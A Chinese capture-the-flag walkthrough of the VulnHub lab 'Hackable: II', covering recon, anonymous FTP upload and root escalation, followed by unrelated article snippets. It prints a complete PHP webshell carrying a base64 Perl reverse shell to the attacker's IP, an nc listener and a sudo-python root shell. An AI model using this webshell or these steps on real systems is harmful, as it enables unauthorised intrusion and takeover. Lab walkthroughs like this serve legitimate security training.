靶場練習第十八天~vulnhub靶場之hackableII

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接:Hackable: II ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -sC -A -p- 192.168.101.124

2.網站信息收集

(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息

發現是apapche默認頁面,使用dirb進行目錄掃描

dirb http://192.168.101.124

掃出http://192.168.101.124/files/,訪問一下

三、漏洞發現及利用

(1)ftp登錄

1.發現21端口允許 anonymous: allowed登錄

ftp 192.168.101.124

2.下載下CALL.html文件,查看其中的內容

get CALL.html

3.發現這就是剛才那個CALL.html文件

4.上傳一個txt測試一下

put swn.txt

查看txt文件,跟我寫的一模一樣

(2)通過ftp上傳webshell.php

webshell源碼

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

1.將php放到/home/kali目錄下,因為我剛才是用kali用戶進行ftp登錄,默認情況下通過這里上傳

2.上傳webshell

put webshell.php

3.在kali這邊開啟監聽

nc -lvvp 4444

4.進入到網頁http://192.168.101.124/files/這邊訪問webshell

kali這邊成功監聽

5.優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):

python3 -c 'import pty; pty.spawn("/bin/bash");'

四、提權

1.發現一個提示文件,讓我們啟動腳本

cd /home

ls

cat important.txt

/.runme.sh

得到一個用戶密碼:shrek:cf4c2232354952690368f1b3dfdfb24d

這個密碼是加密過的,嘗試用md5解密

最后得到用戶密碼:shrek:onion

2.ssh遠程登錄

ssh shrek@192.168.101.124

3.查看該用戶的權限并且該用戶能夠利用引用root相關的執行文件有哪些

sudo -l

4.使用python進行提權

sudo python3.5 -c 'import os; os.system("/bin/sh")'

5.拿下flag

ls

cat user.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375030.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375030.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375030.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Object-c基礎(2)

類和對象 類 在Object-c中類&#xff0c;其接口&#xff08;interface&#xff09;和實現&#xff08;implementation&#xff09;是分離開來的 類的聲明 interface 類名:父類名{實例變量的定義;}方法聲明;...end類的實現 implementation 類名方法定義...end對象 一個類提供…

arm linux 下移植busybox 的tftp

&#xff08;1&#xff09;進入busybox目錄&#xff0c;make menuconfig &#xff0c;然后在networking中勾選tftp項跟tftpd項。 &#xff08;2&#xff09;配置/etc/inetd.conf 中關于tftp的選項&#xff08;此部未驗證&#xff0c;不需要應該也可以&#xff09; tftp dgra…

靶場練習第二十天~vulnhub靶場之Funbox: Scriptkiddie

一、環境搭建 靶官網機下載地址&#xff1a;Funbox: Scriptkiddie ~ VulnHub 百度云盤下載鏈接: 百度網盤 請輸入提取碼 提取碼: i4a9 二、信息收集 1.nmap命令掃描靶機 先用ifconfig查看kali的IP&#xff0c;因為kali和靶機都是NAT模式下&#xff0c;所以用 nmap 192.168…

documentbodyscrollTop的值總為零的解決辦法

有一個功能需要判斷返回頂部按鈕是否顯示。 JS代碼如下&#xff1a; var sTop document.body.scrollTop;if(sTop>100){document.getElementById("sm_top").style.display"block";}else{document.getElementById("sm_top").style.display&quo…

spring mvc 多線程并發

ThreadLocal為解決多線程程序的并發問題提供了一種新的思路。使用這個工具類可以很簡潔地編寫出優美的多線程程序。 http://www.xuebuyuan.com/1628190.html 我們知道Spring通過各種DAO模板類降低了開發者使用各種數據持久技術的難度。這些模板類都是線程安全的&#xff0c;也就…

靶場練習第十九天~vulnhub靶場之GreenOptic: 1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開…

靶場練習第二十五天~vulnhub靶場之Raven-2

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開放的…

每天一個linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虛擬內存統計&#xff09;的縮寫&#xff0c;可對操作系統的虛擬內存、進程、CPU活動進行監控。他是對系統的整體情況進行統計&#xff0c;不足之處是無法對某個進程進行深入分析。vmstat 工具提供了一種低開銷的系統性能觀察方…

用TypeScript開發了一個網頁游戲引擎,開放源代碼

最開始學習電腦編程的原動力之一就是想自己編寫游戲&#xff0c;一方面很好奇這些游戲是怎么做出來的&#xff0c;另一方面覺得有些地方設計的不合理&#xff0c;希望電腦游戲既能讓人玩的有趣&#xff0c;又不浪費時間。 學校五年&#xff0c;畢業十年&#xff0c;學用了十多種…

靶場練習第二十一天~vulnhub靶場之Momentum-1

一、環境搭建 1.ifconfig查看kali的ip 2.創建靶機 靶機下載地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 尋找靶機ip&#xff1a;nmap 192.168.101.0/24 2.端口掃描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;發現開放2…

為集合排序的三個方法

// 為集合字符串排序&#xff08;cmpare:&#xff09; // - null &#xff1a;空類型 就是字符型的0&#xff1b; // - [NSNull null]是對象類型&#xff0c;能夠存入集合的數據&#xff1a;為其分配了內存&#xff0c;但其中的值為空&#xff08;不能被排序否則程序會崩潰&am…

C#ArrayList對象集合

ArrayList alist new ArrayList();//集合對像 長度可以改變&#xff0c;類型不限//添加單個元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加數組或集合最好用 alist.AddRange()alist.AddRange(…

靶場練習第二十二天~vulnhub靶場之Momentum-2

一、準備工作 靶機下載地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看開放的端口和協議&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;尋找隱藏的網站 gobuster di…

索引深入淺出(8/10):覆蓋索引或列包含

在索引深入淺出&#xff1a;非聚集索引的B樹結構在聚集表里&#xff0c;在聚集表里&#xff0c;我們看到非聚集索引的葉子層只包含非聚集索引鍵和聚集索引鍵。從聚集表結構或堆表結構里拿到剩下列&#xff0c;SQL Server需要進行書簽/鍵查找操作。很多情況下書簽或鍵查找非常消…

靶場練習第二十三天~vulnhub靶場之GOATSELINUX: 1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機…

Spring事務報Connection is read-only

昨天做項目時&#xff0c;寫了個方法,程序突然報了Connection is readonly. Queries leading to data modification are not allowed調了程序半天&#xff0c;最后才發現是自己在spring配置文件中增加了事務.把方法寫成了大寫開頭了&#xff0c;但是spring配置是以小寫開頭 代碼…

HTTP協議具體解釋

HTTP是一個屬于應用層的面向對象的協議。因為其簡捷、高速的方式。適用于分布式超媒體信息系統。它于1990年提出&#xff0c;經過幾年的使用與發展&#xff0c;得到不斷地完好和擴展。眼下在WWW中使用的是HTTP/1.0的第六版&#xff0c;HTTP/1.1的規范化工作正在進行之中&#x…

靶場練習第二十四天~vulnhub靶場之Raven-1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開放的…

【知識積累】DES算法之C#加密Java解密

一、前言 在項目需要添加安全模塊&#xff0c;客戶端調用服務端發布的service必須要經過驗證&#xff0c;加密算法采用DES&#xff0c;客戶端采用C#進行加密&#xff0c;服務端使用Java進行解密。廢話不多說&#xff0c;直接上代碼。 二、客戶端 客戶端采用C#進行開發&#xff…

Space.js – HTML 驅動的頁面 3D 滾動效果

為了讓我們的信息能夠有效地溝通&#xff0c;我們需要創建用戶和我們的媒體之間的強有力的聯系。今天我們就來探討在網絡上呈現故事的新方法&#xff0c;并為此創造了一個開源和免費使用的 JavaScript 庫稱為 space.js。該庫是 HTML 驅動的&#xff0c;這意味著你不需要在網站上…